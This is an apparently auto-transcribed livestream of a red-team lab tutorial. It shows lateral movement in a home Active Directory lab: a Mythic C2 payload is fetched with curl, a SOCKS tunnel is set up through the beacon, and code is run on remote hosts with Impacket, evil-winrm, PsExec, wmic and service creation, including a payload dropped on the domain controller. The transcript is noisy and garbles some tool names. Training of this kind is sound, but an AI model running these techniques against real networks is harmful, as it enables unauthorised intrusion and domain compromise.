And then I'm gonna move into the lateral movement techniques. We're gonna get a C2 beacon from Mythic, the Apple agent, and then we can start to test different things, explore different things, and pretty much the format is going to be super open. So if you have any questions, if you have any feedback or anything else, just don't hesitate to hit me up. Now, on here, we have several machines, but before that, let me open my Obsidian so I can walk you through my lab and you can get a better idea of what it looks like. Now, we did a nice stream before, let's say a week ago, I believe, where I showcased and build up that graph you see on the screen. And there I showcased pretty much what my lab looks like, and the configuration is like that. What modifies from the previous stream is that I now have dedicated machines, more dedicated machines. For instance, now we have Help Certificata, we have the Kali internal, we have the Windows 10 client and so on. But in a nutshell, that's about it. I'm gonna walk you super quick about the lab demo. So here we have the gateway, which is my router. In that case, we have one DHCP address to my laptop, which I am streaming from right now. And then we have the Kali, which is in breached mode. What that means is that it's going to get the IP address directly from the gateway using DHCP, the same as it's going to do for my plant machine. Then on the next side, we have my server, which is a huge PC with a nice configuration. And I set up a static DHCP. What that means, I actually call it static DHCP. I'm not sure if that's the correct word for that, but that's how I call it. I've set up a static DHCP address, which means that I reserved the address of 192.168.0.199, sorry, to be specifically designed for my server. So as soon as the MAC address is online, the router is gonna assign him that IP address. So it's always the same. Then on the server, which is right there, I have a lot of machines as virtual machines. So this is my server, and this is my VMware, and these are all my machines. So I have a pfSense. This pfSense uses two interfaces. One interface is for its one address, which is the external address. In that case, it's breached, which means that it's gonna get its IP address directly from the router, which again mean that it's gonna mimic, let's say, real life network, since all the machines inside are hidden inside its second network address, which is for LAN, and that's about 172.60.60.60, and pretty much that's the gateway, and that's the internal network. So we have several internal networks. First one is my machine and laptop. Then we have the pfSense, and the pfSense has its own internal network inside, which has a domain controller, actually two domain controllers, two SQL servers, a vulnerable Linux instance, a Windows 10 client, an internal machine. And if you need help or actually guidance or tips on how you can set up such an app in your environment, just hit me up in Discord, where I can give you some ideas, some help, or we can even do a live stream or video on how we can do that. Great. When that thing happens, since the Kali VM is on breach mode again, as mentioned, it's gonna get its IP address directly from the router, which means that it's gonna have the same subnet as my laptop, as my server, as one of the pfSense interfaces, which essentially mean that since the traffic is outgoing there out, all the machines would be able to communicate directly with the Kali VM, which is the main purpose of the network. And now let's verify that. I'm gonna just super quick navigate to that. Then I'm going to go over the desktop, and now here I'm gonna do first ifconfig eth0, and then I'm gonna do python 3 -m http server 8000. Now the IP address is, I believe, unchanged from the past, 0.157, if that's the case. Now I can go directly to my server. I can log in here. Alright, and now from there, I can try to curl.exe and paste the IP. So I'm going to specify the port, be 8000, and indeed we can see some kind of communication. When I go back to my Kali machine, we can observe the incoming IP address, which is the pfSense, which again proves that our network configuration works quite nice. Da, știu ima. So now, what's the main idea? Is that I have a Mythic C2 running here on my Kali machine. And please, Mythic admin, that's of Mythic CNV. I know I'm leaking all the passwords, but this is just for that instance, which is, I mean, local, so should not be a problem. So here on the Mythic C2, I have already installed my HTTP client, and I have already installed my Apple agent. If you don't know how this thing can get installed, you can navigate to my YouTube channel where I have actually several videos about the Mythic C2, where I showcased how all of these are getting installed, how to set up the Mythic C2, and even how to configure HTTP to operate under HTTPS settings, which in that case is not configured. So if I go to config, we can see the default callback port is 80, and if we go to file manager and then cat config.json, we can see the current configuration, so we pretty much stick with the default values. Oh, sorry. And not only that, we have the port 80 and we have some kind of keys, but a certificate, but we don't use them because USSL is false. What that means is that my machine is going to listen to on port 80 and not 443 or any other port, and I can verify that by going write an HTTP server -80 port 80, and we can see the address is already in use. You can also check that with the command ss nltp and pipe that to grep and the port you want to check. In that case it's 80, and we can indeed see we have some ports 8080 allocated, 8090, 3, 8039, and just 80. Perfect. With that, now it's time to generate our beacon. Now let me get my IF config once again. And go back, action, generate new payload, Windows, next. Let's keep it simple. We're not gonna do some mal-def today. If you want, we can leave that for the live stream. For instance, we can allocate shellcode, encrypt it, execute it, but so on. But now we're not gonna focus on that, so we're gonna use wmic. Then next, I'm gonna include all the commands to be more simple. Now I'm gonna define my parameters to be my IP, like that. The callback port is exactly the same, and nothing else needs to be modified for that purpose. Now, obviously, if you have that during real engagement, you obviously need to modify all the values, including the user agent and the service header, but now it's not needed. Then I can call that Apple, then maybe let's call it Apple main, like that. Create payload, and now we should wait a little bit. Keep it English, guy, please. Keep it English in, please. We are doing lateral movement techniques, so I'm a nationalist too, but here we decide to keep it in English. So yeah, we're doing lateral movement. So now I'm gonna compromise one of the hosts, for instance, equal 01 or 02 of the Windows 10 client, and then I'm gonna move out throughout this domain, so we can showcase different techniques like tunnels, how they work, different setup, different tools for tunnels, and so on. Now, one cool trick in Mythic, which I didn't know, is that you can click here, copy link address, and now watch now. I'm gonna go back to my SQL instance machine. I'm gonna do curl.exe. I'm gonna paste the URL and now modify the IP address. So in that case, it was 192.168.0.157, and that's gonna give me, of course, I need to specify -k to ignore self-signed certificates, and now it's gonna give me the option to save the file because this is the download of the file. Then I can do --or -o, and then just call it on the desktop, or I'm on the desktop. Let's call it a.txt, like that. And the a.txt appears right here. Now I can directly run it, and we should see a beacon right off the bat. So I'm gonna go back, we have new callback, I go to callbacks, and there it is, boom. Now that's a nice trick in the Mythic, which allows you to directly download payloads without specifying any other HTTP ports or any other services. So just by copying the link, we can do that. Yes, we're gonna use Ligulu, and proxy chains is not true for tunneling, but let's say interface for your tunnel, and we're gonna talk about that now. So here this is our callback, and by default it's like a 10 seconds overall sleep count. So what I'm gonna do, since we are going to try different things, I'm gonna do sleep 0. So this is gonna make the payload more responsive, and I know it's not PSExec safe, but now it's best time to say that. Now here we have several options to lateral move into different techniques. Now imagine I have credentials which are, let's say, high privileged. Yeah. Now, of course, we don't have to underestimate the service exploitation and searching for network vulnerabilities, but we're not going to do that now. But that's obviously a case where we can do lateral movement. All we can do is we can imagine we have credentials which are, let's say, domain admin, who is super privileged. Now, if I do that, I am currently not a domain admin. I'm a SQL1 user, which, as you can see, based only on the power of that, is not a admin after all, because if you got admin shell with high integrity, you're gonna see a red callback here, a red color. In order for that to happen, we have, let's say, several ways to do the tunnel. We can of course do some kind of a tunnel, and then we can do lateral movement. We can then use the second way of doing the actual lateral movement is directly from the Windows machine. So we can, for example, if we have the needed rights and needed account, we can directly upload things like PSExec and other utilities, which can help us do the lateral movement from Windows. And then as third option, we can indeed use something like different utilities like wmic, like sc.exe and so on, but we're gonna dive into that a little bit later. Now the first thing I want to showcase is how to perform a tunnel to the network from any C2. Now usually when you have some kind of a C2 framework, it has a built-in tunneling support. So no matter if it's Havoc, Mythic, BRC4, Cobalt Strike, Metasploit, doesn't matter, it has its own tunneling utility. In Mythic's case, I'm using Apu right now as an agent, but that's pretty much agent dependent. Apu has options for socks. So if I do socks, now I need to define a port, and then I have a tunnel. And obviously, it's a nice idea to have, before you run the tunnel, to have the sleep 0 parameters. And when you do so, you're gonna have more, let's say, true results. If you have some kind of a sleep with a jitter and you try to do a tunnel, it's not gonna be stable. So for that case, I'm gonna define a port. And if you go to the terminal and type ss -nltp, but remove the grep and everything from it, we can see different ports starting from 7000, which is 7000, up until 7010, which should be somewhere, here. Now these ports are specifically designed for tunneling interfaces. So by default, in Mythic, you can have up to 10 tunneling interfaces running simultaneously with each other. So let me showcase how that works, but keep in mind that in Mythic, when you specify a tunnel, you have to choose between some of these ports. I think they can be configured. So if I do cat Mythic environment, maybe try to grep for socks or sock or 7000. Yep, we can see Mythic server dynamic ports 7000 to 7010. We can of course change that, and then we can use it to perform tunnels on the ports we specify, but by default they are from 7000 to 7010. Now here it's enough to just type 7000, or let's do 7001, why not? I'm gonna task that, and when that happens, you can see we opened port 7001 for socks. We can also now go to the socks menu, which is right here in the socks, and we can indeed see the actively running socks at the moment. And we can also see the callback and the tasks. So we have which is, by the way, super nice. I appreciate how much Mythic records things and how it lets you know where everything is. For instance, now we have the user and the host. Description, of course, is the default. And then we have the callback, which we click here when we go to the callback. And then we have the exact command, exact tasks. So if I run that, we can see the exact task of me setting up the tunnel, which is super nice. All right, so with that, now we need to set up proxy chains. So do I have that on my machine? Yes. In that case, I'm gonna do sudo etc proxy chains for.conf. I'm gonna go, yeah, we need vim, of course. And now I'm gonna go all the way to the bottom. And here I'm gonna leave that to SOX 5, I believe is gonna work. And the IP is the same, obviously. And then we're gonna need to use 7001 as support. All right. When I do that, now my tunnel should be complete. And we can try that by doing proxy chains and map. And let's try to scan the domain controller. So 172.60.60.50. Now let me double check if it's running, but it's not at the moment. So I'm gonna start up a little bit more machines of my environment. I do not need the Kali. I'm gonna start the B box. I'm gonna also start the SQL2 machine. Alright, that's gonna take a lot of time to boot, but after that should be completely fine. Now we're gonna operate mainly with these two machines. We can also scan the firewall, but yeah, the B box is already started. So I can do ifconfig there just to see the IP address, which is 61. And from here I can try to scan it, -pn, -vv, and we can right off the bat see some of the open ports like 445, 80, 3306, and so on. Now from there we can obviously try to navigate to the ports, but we need some kind of a proxy before that, because now if I do that, I'm not gonna see any bbox application. So for that, I am a fan of Foxy proxy. So here, get the add-on, add. All right. Now from there, I can go into the toolbar, options, proxies, add. Let's call that Mythic. Now here, specify the IP address. The type is not HTTP, but rather SOX 5. The port is 7001. And let's choose the red because so we were talking about Mythic after all. Click save, and now should be all right, I believe. And now if I go back to the same page, remove the HTTPS. Now I choose the Mythic SOX. I run it, and in theory I should be able to see the BWAP interface. Now here, as I mentioned before, we can directly go for some kind of exploitation. For instance, I know that this machine is quite vulnerable, and I highly suggest you guys try it out because it has a lot of vulnerabilities inside, and not only web-based, but also like service error-based. We have super outdated services, and there's plenty of ways to compromise the machine. One of the ways is via outdated Drupal instance, which is vulnerable to Drupal as the name suggests. So that would be one way to lateral move into some kind of Linux host and so on, but we're not here for that. So that's just one thing you need to pay attention when you're doing such kind of exploitation. But now the important part is that I can now run Impacket tools. For instance, I can now do proxy chains, Impacket. Let's go. Yeah, let's try maybe PSExec. Then go with K2Z, which is my one of my domain admins. And on host 172.60.60.54, I believe the SQL server should be started. All right. Now my password. And let's see if it's gonna work. And the seizure became too strong. Be right back. Alright, do we have something? No? Let's first try to probe the port, so I can try proxy, chains, NC, 172, 60, 60, 54, 4445, MV. It looks like it's not opened. Why it's not opened? Because maybe IP address is not that. So what we can try is first log in. Then open, of course, the PowerShell. Do IP config. And looks like that's the address, but I'm not sure why we can't see that. We have connection refused. Let's try with nmap. Proxy chains, nmap. We can see the bbox machine if the tunnel didn't break, because most likely something happened and the tunnel is now broken. And I'm really not sure what happened. That's strange. We can try on a port which we know is open. Let's say 80. And yeah, the tunnel is somehow dead. And the beacon is dead. So yeah, that's why. So something happened with the beacon itself. I'm not sure why and why it stopped from working. But the last check-in was 3 minutes ago. So it was not due to endpoint protection, because here I don't have any, but I'm really not sure what happened. So I'm gonna try to get a new one. I want to hide this one out. I'm gonna go to socks and remove the previous one. Then I'm gonna go to here and create a new one. So sleep 0, then try socks and same port. After doing that, you can see how easy we can migrate into different socks, and now it should be running again. So if I do the same command as before, now it's open. And if I run the same SMBexec as before, we can see maybe wrong password. Alright, let's try PSExec or wmic. That's super strange. Let me try. Oh, the domain is not there. Okay. wmic.local. Like that. Let's directly type the password here. Why not? I'm a huge Witch King fan. Don't blame me. Like that. And yeah, now it should work. So I was missing the domain. But after all, we can see that now we have moved into the SQL1. So in the diagram from the network, first we landed on this machine, we set up a tunnel to this machine, and then using wmic, we went to this machine right here. So one way we can use things for lateral movement, if we have credentials from, let's say, password spraying or credential snuffing or anything else, we can just set up a tunnel and then move through Impacket tools, for example, wmic, SMBexec, PSExec, and even WinRM. So if I can go to here, I can remove that, I can exit it, then I can go evo WinRM, which is by default built in Kali, and then I can do the same thing. So the IP address is again 172.60.60.54, then the username is going to be K2Z, then the domain is -D, I believe. Actually, no, it's not D, but it's rather, yeah, it's -R, wrong. Then here it's lsec.local, and of course the password for the Witch King, and that should be enough. And by specifying proxy chains, we can again should be able in theory to access that if WinRM is accessible. Now we can try the same thing over the domain control if it's booted, but it's not. Never mind, you got the whole idea. So in that case, the WinRM service is not enabled after all, or I have the wrong command. So the IP, the user, we have the realm, we have the password. Yeah, so that should be it. That should be it. We can try again with minus S for SSL, but I think that's oh, actually it's not that. Minus S. Yeah, it's not enabled. So never mind. That's the whole idea. If WinRM is enabled, you can directly use Evo WinRM, and if not, you can use all the Impacket tools, which can help you jump between the hosts. So far, we have two variants for for lateral movement. We have one service exploitation like Drupal-geddon, and other exploits which can help you land on a specific machine. And second, we have tunnel plus Impacket tools. Now for tunneling, we can use anything from Chizo, Ligolo, the built-in tunnel from the C2 framework. That's up to your need. So it's a matter of test, because sometimes, as you see, the tunnel broke, the agent broke, and I believe it was due to the high load of traffic we generated with the nmap script, which in theory should not break it, but I'm really not sure what happened there. So usually we can do something like Chizo or something like Ligulu and so on. The cool part about that is, for example, most of the C2s has different kind of assemblies or PE modules, which can help you execute in runtime, assembly, or PE. For instance, in Mythic, we can register assembly or register off. In that case, I think it's a beacon object file, but I'm not sure we're gonna dive into that. We can register file, which can then be used for execute PE. And if you register Chizo or Ligulu NG, you can directly execute it from your C2, which is super nice. All right. Now, questions. Let's see if we have some. Will lateral movement include evasion? Are those defenses disabled pre-engagement in this case? Well, that's a nice point. Usually, the tools from Impacket are super loud and they are heavily signatured. So, for instance, if there are enforced protections like EDRs, not the memory scans, the network traffic, IDS, IPS, firewalls, and all the setup inside, if the environment is hardened in one word, this is not gonna work unless you manually tweak and modify that. So different binary, different programs like PSExec, SMBexec, and wmic have different way of engaging with the lateral movement. For instance, WMI is using WMIC to execute command. SMBexec is storing a bad file on the Windows machine and then executing it. PSExec is storing another file which is not bad, but I believe service executable, and then executes it using service creation. So based on your tool, you're gonna have different ways of performing the lateral movement technique, and usually wmic is maybe the stealthiest after you combine it with some flags, but usually Impacket tools are signatured, so it's definitely good to take a look at them and try to manually modify and invade some signatures. Right. So about the next question, which is, how is lateral movement prevented from a SOC perspective? Maybe by setting up a enforced environment. So if the EDR is super hardened, as soon as, for example, he sees that some binary is getting dropped into some of the shares, or as soon as he sees a remote bad file is dropped somewhere and analyzes the bad file, this can prevent lateral movement in this form. Also, as mentioned, IDS, IPS can help, but I believe the main thing to block such lateral movement attack is the EDRs. Yeah, so when the EDR is there, it's set it up, it's hardened. I think it should be the best effort to bypass that and to create a dedicated binary which bypasses that, so we can laterally move on to it. So yeah, that's one of the things. And usually, if you need some kind of persistence, and you've mentioned install vulnerable Linux instances, it's always worth exploiting that, getting a beacon from a Linux instance, so we have some kind of persistence, and then try to move out and poke and so on, so we don't depend just on one beacon. Just as a tip. Now the next thing I want to show is the PSExec. So first we need to download that, Windows sys internal suite. Yeah. Oh yeah. Let's download that. Let's actually copy that to OPT. Alright, actually let's make folder. And now unzip. So all these binaries are super nice. So these binaries are native signed binary from Microsoft, which are utilities for engaging with the system, let's say. We have different binaries for checking the access of different files. We have the PSExec. We have things for analyzing different processes like procdump and procmon, process explorer, and so on. So we have a nice set of utilities which can help us not laterally move, to actually analyze the system and work with it. But one of the tools is PSExec. So where is that? Yeah, it should be here. Yeah, PSExec, and all of them have 64 version and also 32-bit version, and obviously we're gonna need to use that. So here we can try to, we can here try to either upload it, because by uploading the PSExec, it's a native assigned to Windows binary, and it's not gonna raise that much awareness. But if not uploading, we can try different modules like execute p, register files, and so on. So let me first try that. So let's try register file. Let me select the file, go to other locations, OPT, like that. And now PSExec64 task. Alright, that's been registered. Now let's try to execute P. Alright. Now it's automatically been populated. Now let's try accept error. And if we see the help message, that means that from Mythic we can now operate with the PSExec. And yes, we can indeed operate from it completely from memory. So the first option is, as mentioned, we can drop it on the system, and the second option is to use it in memory, such as with such modules that can execute these, which I believe is the better one, right? So now in order for this to work, we need to have some kind of privileges. We're not gonna do that from the SQL1 account because we don't have much elevation on it, but we're gonna get a new beacon. So I'm gonna go to the SQL02 as my domain admin user, and then I'm gonna transfer the beacon so I can operate again with it. So here I can go and do the same trick. So I'm gonna copy the link, I'm gonna go here, I'm gonna do curl.txt, and the funny thing is that if you do curl, this is going to give you the invoke web request by default, but in most of the updated systems, I believe from 2016 above, you can directly go with curl.txt, which is pre-installed in the Windows machines. So of course you're not gonna see that in some kind of obsolete systems, but you're gonna see that in everything up until up next 2016, which is super nice. So I can do curl.txt, then paste. Oh, sorry. I need to copy the link again, then paste that, modify the IP address again. In that case, it is 92.68. 0157. Now minus K, and I'll put that into desktop a.exe. Now see into desktop, run a.exe. If we go back, we can see a new callback from K to Z. And now if we go here, actually I needed to actually execute that as administrator, but I'm not sure if that's gonna work. Let me try something. If this is booted up, it is, so I can try GCI 172.60.60.50. See, and I can see it. Yeah. So what that means is that here I can pretty much view and query the share on DC, which is share C, and I can effectively upload files to that. So I can see files and upload files because I am a domain admin. So even though I have not local high integrity shell, I believe I can still do that. So for that, I can, for example, copy apple.exe to there, so I can see it to my desktop, and do copy a.exe into 172.60.60.50, which is again my domain controller. Let's copy it to C, and then a.exe. It worked. So if I do GCI again, we can see a.exe is on the domain controller, and we can verify that by logging in. Then open the file explorer, go to this PC on the C, and we can see the a.exe is there. So by having a high privileged user, you can indeed view remote files on remote shares, and you can also copy files on remote shares, and that's how we can get the PSExec to work. Now, here I'm gonna again set up the sleep timeout to be 0 just for better use. With that, I'm gonna again register file. I'm gonna register the same PSExec 64, task that. All right, and now it's time to use it. Now let's try execute PE. Now add an argument, which in that case is accept EUA. Add another one, which is 172.60.60.50 C a.exe, and I believe this should be enough because we are already domain admin. So let me try to task that. Let's see if something's gonna happen. And yeah, we didn't accept that. We have a typo. Accept. Yeah, we have typo. Let's just try again. But instead of let's fix this up the argument. Accept EUA. Run that. And now let's see the parameters. I forgot how this been done. Yeah, thanks. So we can do -s if we want to execute that as system account. We can do -i if we want that to be interactive. But what was the syntax? PSExec, lateral movement syntax. Oh, okay. All right. So we can try something like execute P. Then we can try again accept EUA. Don't make type now. Then try -u. Okay, to that. Then try -p for the Lich King. I believe we don't need to encode that. And now we need the DC and the command. Okay, so in that case, it would be 172.60.60.50. All right, and then the command would be c a.exe. Let's task that and let's see if it's gonna work. Alright, so connecting to the DC, couldn't access. The handle is invalid. Alright, that's strange. Let me try something else. Maybe try encoding the password. And now here, instead of the IP address, we can try DC01. And again, the handle is invalid. That's super strange. Maybe I did something wrong. Let me try before doing that from the C2. I want to place that locally here. So I need to first translate the PSExec.exe. So here I'm gonna close that. Here, close that. Alright. We want to keep the beacon active. So from the beacon, I can simply do upload, select a file, which is PSExec, and task it. I'm not sure if it's going to be uploaded to the documents. Yeah, so, directly on the desktop. Nice. So from here, I can try the same command, PSExec, username. Maybe I missed the domain again. Let's try K to that. Let's zoom out, zoom in actually. No, it doesn't work. I hope you guys see it. Let's try it like that. Login failure. Alright, let's try EOSEC.local. Let me try encoding the password. That's strange. Maybe encode that also. Am I missing something? Do you guys have any idea what's my issue there? So if bothering you, I want to offer promotion. Yeah, no, thank you so much. Don't need it so far. Okay. Yeah. Now let's see if I do something wrong. You don't specify domain here. Just the password. All right. Let's try that. So here. CMD. Let me try other domain admin account. Logon failure. Let me try something else. Let's try, instead of the DC, let's try HTML1. And I'm really not sure why that fails. You guys have any idea why that fails? Maybe try with IP address only? Or just the... And we're going to have login failure. What does this error mean? How to fix that? Is it setting on my machine? Let's see. Oh, okay. So it's like something kind of for GPO for that. Should we do that? Yeah, so let's just try. Let's just try. Let me go to this local security policy. Now it was on security settings, local policy, user right assessment, like that. And now allow logon locally, which these are enabled. And why I can't add to the group? So administrators is actively can log into here, and I am on that group. So either is something wrong with my environment, or this snippet doesn't work anymore. So let me try to figure out another way. So that blog post, by the way, is super nice. We can try different things from it also. We can check that now. Okay. So we have two slashes, maybe the host name, which I believe. So mv, yeah, the remote machine, mv. Username is a domain. You had the same thing we did, just the occasionally parameters is different, which shouldn't make a difference, but let's try it. So we can go back on here, we can try PSExec, now DC01, username is sec.local, okay, to that, or let's go for administrator and ipconfig. And yeah, something is messed up with my environment, I'm quite sure, because this in theory should work. So let's leave that a little bit. I'm gonna debug on my own what's the actual reason for that. Do not waste more time. Let me go to this nice blog post, which I super nice recommend. That is from one of the Spectral's members, and here he has a lot of ways to actually do lateral movement. Now, the PSExec is the one we tried, so we can again try that. So specify the domain, play with different parameters. So in that case, it's DC01, not EOSEC. Couldn't access. The network path is not found. Maybe EOSEC.local. Yeah, so we have some kind of a general issue with that. Yeah, never mind. We're gonna leave that for now. And we have quite other options. So we have the SC options, which is the service controller. And be right back, I need to fix my calls from the shisha. Give me a second. All right. And now here, this is the service creation pretty much. So we can also test that. We have wmi, which is the Windows Management Instrumentation, which has the capability of executing commands. Let's see. Do we see the calc being spot in here, or do we see it on the remote machine? I think it should be on the remote machine. So if we copy that snippet right there, let's try that. paste wmic. Then we have PSExec.local. The user is PSExec to that. Password is again. Like that. Process call create call.txt. So if we have the return value of 0, we should be able to see the calculator there. So this was against where? Maybe we need on the node specify the machine we want to target. So here is the DC01. All right, run it, and nothing there. So let's see. Yeah, so the node is the target machine. What's the full domain name? User. Yep, like that. Password, alright. And this doesn't work again. Oh yeah. Let's see. Maybe try full domain name. I'll say that local. A to that. Password. Password is correct. I can confirm that. And now let's try it like that. Do we have something? No. Let's try without the domain. So like that. Nope. And let's try with the IP address. Let me try again so against this self machine. Yeah, cannot be used for local connection. Let me try 52. DSQ01. And we don't have calc either. Now I'm thinking of something. Based on the response here, we have so we have 3144, which I guess it was not for our case, yeah. Or maybe it's different each time. Yeah, so that's the proxy ID, it's different each time, so it's not an error from our side. Maybe we can also try something else like cmd.exe. Let's target the DC actually. Okay, nothing happened, but what we can try also is maybe this is a blind command execution because the return value is 0, which proves that it works in some form. So what I also can try is not cmd.exe, but remove everything and just type calc.exe, just for fun, let's say. Nothing happened. But what if we do PowerShell -c IWR HTTP? Let's try to cover my machine back. So here, let's set up another Python HTTP server. Now from here, let's try to call that. Do we have anything? And we have. So that proves it's a blind command execution, which means that if we use things like calc, cmd, and so on, we're not gonna pretty much be able to see something going on, but it works. So from there, we can essentially do something like cmd.exe -c and c c a.exe, and in theory this should give us a beacon. Please work. Yep, it works. So the cool thing about that is, first, you can use wmi to execute commands on specific host, and I can say depends on the context, but for me the good thing is that whenever you get a beacon, you use the context of your user. So you're not a system, but you are a user you just use to create that. which I believe is super nice. So that's how WMI works. If you need, let's say, a beacon from the context of your user and not from the context of system or someone else, this is the way to go. So we can explore more options like, let's say, WinRM. We already tried that. We have scheduled task for lateral movement. We have even MS build for lateral movement. What the hell? So we can store file somewhere. We have a specific template which we can create a shellcode and actually execute it. So that doesn't work. First, we have to locally host the XML file. We have to drop it on disk. Let's say, yeah, with the same thing we did with the copy command, and since we have permissions, it's going to be copied to the remote machine. All right. And then we can use PSExec to actually execute it, which is super nice. We have also DKOM, lateral movement, remote firewall port. Whoa, we have so many things. We have so many things. We can even use HTA for that if we have HTA payloads. Which here, if you use things like that, Covenant should be the way to go. If you decide you want to use HTA for payloads, because generally speaking, Covenant supports such payloads. I mean, with the HTA, we can, in the run me HTA, we can obviously execute PowerShell commands and CMD, but that's gonna allow us to spawn new process with CMD and PowerShell, which is super suspicious. So I believe if we store a Covenant beacon on something like an HTA file and execute it like that, that's gonna be also a nice option, and we have a lot of things there. So the last thing I want to try is pretty much the SC, and the reason for that is not that I like the SC so much, but because the Mythic has support for SC built in. So I can run SC, or I can try help SC. And as you can see, Mythic has its own utility for engaging with the service control manager. So it's a wrapped function. All right. We're gonna operate again from the second beacon. So go back 4. We're not gonna touch the DC now. And let's see how they do it here. It may not appear. Yeah, maybe local account token filter points. Maybe that's the reason for that. Let's try the SC and then try to fix that. It may not appear, but if we open the task manager, it may work on the background. Although not visible. Yeah, you're actually right about that. So I can go to the DC. I can open task manager, more details, and calc. Oh, it's not there. No. We have some kind of a CMDs. So maybe this one, let's try the same thing and see if we can get one more CMD. So from there I can use that. And yeah, we have one more. Yeah, so it's on the background. We spawn the process, but it's not visible to us as the end user. So that's a nice thing to know. Yeah, nice tip there. Great. So let's go back to the host service creation thing. Now here on the SC, let's see how it works. There's WMI. We have SC. All right, great. And we need again to store that somewhere. Yeah. So can we copy it directly from Mythic? So let's try something like shell dir 172.60.60.50. See? Let's see if we can copy from here. Yep, we can. So we can try do ls. Yeah, we can copy it with the same way. But just for demo purpose, I want to copy PSExec 64 to here. So let me try shell, copy, or do we have copy utility in Mythic? No, we don't. Okay, so in that case, what about uploads? Can we do something like, I access check, and we go to 172.60.60.50, and we go to C, maybe. Access denied. But why? So when using shell, I don't get that. Maybe the apport function is using some kind of specific Windows APIs that blocks us from accessing the chair like that. Let me try one more thing. In the apport, select the file. Let me try 60.60.50. See. Access.exe. Oh, and it worked. We can try again the same shell dir. There it is. There it is. Nice. So when using Mythic, you can directly import files to any remote system if, of course, you have permissions for that. Wow, that was crazy. So when you specify the host, I'm not sure why that works like that, but when you specify the host, it doesn't work because who knows why? Maybe it's specific APIs for the case. But when you specify the destination to be directly a different host, different share, and the full path, it works like that, which is great, to be honest. Wow. Then let's try SC. If we do, there was syntax. If we do Control and Enter, no. If we do Alt and Enter, no. Shift. Yep. Okay. So what happens is that you can try SC, and if you see, I press Enter, and you can see past arguments are ambiguous. So I can do Shift and Enter, which was here, but I didn't read it. We can then see the menu, which you can pass arguments more easily. And now here we need to obviously create a service for that. Then the computer is going to be dco1 eosec.local. Then service name is going to be test, binary path to be ca.exe. Maybe, I'm not sure about that. We are creating it here. Display name test. Okay, it stopped. Now I think we need to start it. SC host domain start service. Okay, good. Then we can try SC, shift enter again. Now go to, instead of create, start test, and do dco1 eosec.local. Boom, we have a beacon. Nice. Nice. Oh, all right. So what happened is that I think using the SC utility from Mythic is way more OPSEC thing to do instead of spawning a shell and using sc.exe from there. I mean, you can obviously do shell or actually run sc.exe. You can use it like that, but I believe that's gonna, as you can see, it works. But I believe that's gonna spawn some kind of more IOCs rather than using the built-in wrap function from Mythic, and that's what I want to test so much and turn out to work so nice. I think the beacon is dead now. Not sure why. Let me try to get a new one. Alright. Now I need to stop or restart it. Oh, there it is. Okay. Is it dying immediately? Maybe the reason why it's dying is that because the a.exe is not a service binary, so the service binaries are different from the normal binaries we use, like a.exe and the one from Shadowborn from MyPacker. So that's giving me a reason to add service binaries as an option to Shadowborn. But although it worked now, which to me is kind of yeah, it died. So what happens is that it dies most likely. Maybe if you guys know another reason, it's gonna be useful to shoot it out. But I think that it dies because it's not a service binary, and since it's not a service binary, it executed and right off the bat stops to work with some kind of exception error and so on, and that's why it stops. So maybe for the next stream or for the next video, I'm gonna showcase how to create service binaries, the one that are applicable for such cases. And then I'm going to add that to my Shallow Packer. So if you are my patron, you can directly specify a service binary, and then you can have your service binary, which you can use for lateral movement, which is great. I think we did a nice job. We specified, we tried several ways of doing lateral movement. Although I'm yet to debug what happened with the PSExec, so I'm gonna in privately research that one out because I'm gonna waste so much time on that. So I really appreciate you guys for watching, and thank you so much for staying there. This is going to be uploaded to YouTube, so if you can rewatch it later if you want. Uh, yeah. So thanks so much. I appreciate you there. So the stream was nice, and we can start do a little bit more advanced and nice stuff. I'm planning to do Mythic agent development, so that's I think a nice reason to stream about. I think what doing that live should be a nice idea. And yeah, I'm gonna definitely see you in the next one. And this is going to be uploaded to my YouTube. Yeah, thank you once again, and see ya.